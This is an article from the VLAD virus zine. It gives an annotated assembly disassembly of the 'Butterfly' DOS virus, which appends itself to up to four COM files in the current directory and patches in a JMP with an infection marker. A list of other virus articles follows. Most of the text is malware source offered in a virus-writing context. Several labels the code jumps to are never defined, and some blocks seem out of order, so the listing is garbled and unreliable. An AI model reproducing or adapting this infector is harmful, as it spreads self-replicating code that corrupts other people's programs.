Virus Labs & Distribution
VLAD AF - Butterfly Disasm

;               Butterfly Disassembly
;                  by Qark/VLAD
; This poorly written virus is a direct action parasitic com infector that
; infects four files, if available, in the current directory.
; It's one claim to fame, is accidentally being included in the Telemate V4.0
; OAK VGA drivers.
; It has some lame coding, and some bits of code, that look like they
; were left in by accident, such as setting a register, and destroying
; it without using it in the next line.
; I remember hearing somewhere that this virus is just a hack of the
; "Fuck John McAfee" virus.  There was a rumour that John McAfee got pissed
;  at that, and edited it to say "Goddamn Butterflies" instead.
; This virus is so boring and ordinary I thought it would be the perfect
; April Fools treat.

		org     100h

		jmp     virus_start

		db      1
orig4:          int     20h     ;offset 104h
		call    get_delta
		pop     bp
		sub     bp,offset get_delta

		;Restore host bytes.
		mov     di,100h
		lea     si,[bp+offset orig4]
		mov     cx,4
		rep     movsb

		;Set DTA to end of virus
		mov     ah,1ah
		lea     dx,[bp+newdta]
		int     21h

		mov     byte ptr [bp+counter],0

		;Find first potential file
		mov     ah,4eh
		lea     si,[bp+offset foundname]
		lea     dx,[bp+comspec]
		push    dx
		jmp     short findfile
		;Restore the original DTA
		mov     ah,1ah
		mov     dx,80h
		int     21h

		;Clean the registers before exit
		xor     ax,ax
		xor     bx,bx
		xor     cx,cx
		xor     dx,dx
		xor     si,si
		xor     di,di

		mov     sp,0FFFEh               ;Reset the SP

		;Return to host
		mov     bp,100h
		push    bp
		xor     bp,bp

		or      bx,bx                   ;Is there a file handle ?
		jz      fnext

		;Set CX to attribute, but destroy it immediately.  Error.
		mov     ch,0
		mov     cl,byte ptr [bp+attrib]

		;Set original time
		mov     ax,5701h                ;Set time
		mov     cx,word ptr [bp+ftime]
		mov     dx,word ptr [bp+fdate]
		int     21h

		;Close file
		mov     ah,3eh
		int     21h

		xor     bx,bx
		;Find next
		mov     ah,4fh
		pop     dx
		push    dx
		mov     cx,7
		xor     bx,bx
		int     21h

		jnc     open_file
		jmp     nomorefiles

Namestring      db      -1,'Goddamn Butterflies',-1
		mov     dx,si
		mov     ax,3d02h
		int     21h

		jc      donefile

		mov     bx,ax

		;Read first four bytes of the file into orig4
		mov     ah,3fh
		mov     cx,4
		lea     dx,[bp+orig4]
		int     21h

		;Avoid all files with ?????ND?.???
		;Most probably
		mov     ax,word ptr [bp+foundname+5]
		cmp     ax,"DN"
		je      donefile

		;Check if already infected
		cmp     byte ptr [bp+orig4+3],1
		je      donefile

		;Too small ?
		mov     ax,word ptr [bp+filesize]
		cmp     ax,121
		jb      donefile

		;Seek to end of file
		mov     ax,4202h
		xor     cx,cx
		int     21h

		cmp     ax,0fd00h               ;Too big ?
		ja      donefile

		;Save file size
		mov     word ptr [bp+savedsize],ax

		;Write original bytes to EOF
		lea     dx,[bp+orig4]
		mov     cx,4
		mov     ah,40h
		int     21h

		;Write virus to EOF
		lea     dx,[bp+virus_start]
		mov     cx,offset newdta - offset virus_start   ;virus size
		mov     ah,40h
		int     21h

		;Seek to start of file
		mov     ax,4200h
		xor     cx,cx
		int     21h

		;Calculate JMP to Virus
		mov     ax,word ptr [bp+savedsize]
		inc     ax
		mov     word ptr [bp+orig4+1],ax
		mov     byte ptr [bp+orig4],0e9h        ;Opcode for JMP
		mov     byte ptr [bp+orig4+3],1         ;Infected marker

		;Write JMP to Virus
		lea     dx,[bp+orig4]
		mov     ah,40h
		mov     cx,4
		int     21h

		;Check to see if three files are infected
		inc     byte ptr [bp+counter]
		cmp     byte ptr [bp+counter],4
		jae     stupidjmp
		jmp     donefile
		;This routine does nothing.. must be an error.
		mov     di,100h
		cmp     word ptr [di],20cdh
		je      stupidjmp
		jmp     exitvirus

comspec         db      "*.COM",0

NewDTA          db      15h dup (0)
attrib          db      0         
ftime           dw      0
fdate           dw      0
filesize        dd      0         
foundname       db      13 dup (0)

counter         db      0
savedsize       dw      0


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Butterfly Disasm
ARTICLE.2_2       Grandma Disasm
ARTICLE.2_3       Winword.Nemesis
ARTICLE.2_4       Stupid Poly guide
ARTICLE.2_5       Immortal Riot
ARTICLE.2_6       40hex
ARTICLE.2_7       Poet virus


VLAD Viruses
ARTICLE.3_2       Systa
ARTICLE.3_3       Improbability
ARTICLE.3_4       Vampire-1
ARTICLE.3_5       Prepender
ARTICLE.3_6       Futility+
ARTICLE.3_7       K-Rad


ARTICLE.4_2       Televirus
ARTICLE.4_3       Batchbug
ARTICLE.4_4       242
ARTICLE.4_5       ASMVirus
ARTICLE.4_6       NFV
ARTICLE.4_7       April-1

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